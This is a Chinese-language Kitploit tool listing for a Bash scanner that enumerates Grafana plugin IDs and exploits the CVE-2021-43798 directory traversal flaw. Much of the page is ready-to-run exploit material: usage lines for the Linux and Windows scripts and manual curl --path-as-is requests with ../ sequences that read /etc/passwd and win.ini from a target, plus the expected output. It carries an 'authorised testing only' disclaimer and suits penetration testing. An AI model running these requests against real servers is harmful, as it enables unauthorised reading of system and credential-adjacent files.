Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — 基于 Bash 的扫描器,枚举 Grafana 插件 ID,并通过尝试在易受攻击的实例上读取 /etc/passwd 或 win.ini 来测试 CVE-2021-43798 目录遍历漏洞。 | Kitploit
工具/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
漏洞扫描器Web漏洞扫描器漏洞利用脚本与自动化Web应用程序漏洞利用信息收集渗透测试
GitHubsqu1shification/grafana-plugin-enumerator-cve-2021-43798

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

Grafana-Plugin-Enumerator-CVE-2021-43798

基于 Bash 的扫描器,枚举 Grafana 插件 ID,并通过尝试在易受攻击的实例上读取 /etc/passwd 或 win.ini 来测试 CVE-2021-43798 目录遍历漏洞。

查看仓库
113小时27分前尚未审核
分享

Grafana CVE-2021-43798 插件枚举器

一个基于 Bash 的小型工具,用于测试 Grafana 实例是否存在 CVE-2021-43798,这是一个影响存在漏洞的 Grafana 版本的目录遍历漏洞。

该工具枚举 Grafana 插件 ID,并使用 curl --path-as-is 测试目录遍历是否能够访问已知文件。

仅限授权安全测试和实验环境使用。

文件

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh:测试对 C:\Windows\win.ini 的访问
  • grafana-linux.sh:测试对 /etc/passwd 的访问
  • plugins.txt:包含枚举期间使用的 Grafana 插件 ID 的字典文件。

要求

  • Bash
  • curl
  • 一个 Grafana 目标
  • 测试该目标的权限

检查 curl 是否已安装:

root@kitploit:~
curl --version

使脚本可执行:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

CVE-2021-43798 概述

CVE-2021-43798 是 Grafana 中的一个目录遍历漏洞。

存在漏洞的端点基于: /public/plugins/<plugin-id>/

该漏洞可能允许遍历到预期插件目录之外。

使用 curl 测试时的关键部分是: --path-as-is

如果没有此选项,客户端可能会在将路径发送到服务器之前对其进行规范化。

Windows 扫描器

Windows 扫描器尝试获取: C:\Windows\win.ini

该路径在 HTTP 请求中表示为: Windows/win.ini

基本用法

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

示例:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Windows 手动测试

你可以使用以下命令手动测试某个插件:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

对于实验目标:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

成功的响应应包含 Windows INI 文件内容。

Linux 扫描器

Linux 扫描器尝试获取: /etc/passwd

基本用法

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

通用示例:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Linux 手动测试

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

对于实验目标:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

成功的 Linux 响应应包含类似以下内容的条目:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

命令行选项

两个扫描器使用相同的基本参数:

  • u, --url:Grafana 基础 URL
  • w, --wordlist:插件字典文件
  • f, --file:要测试的文件
  • h, --help:显示帮助
下载工具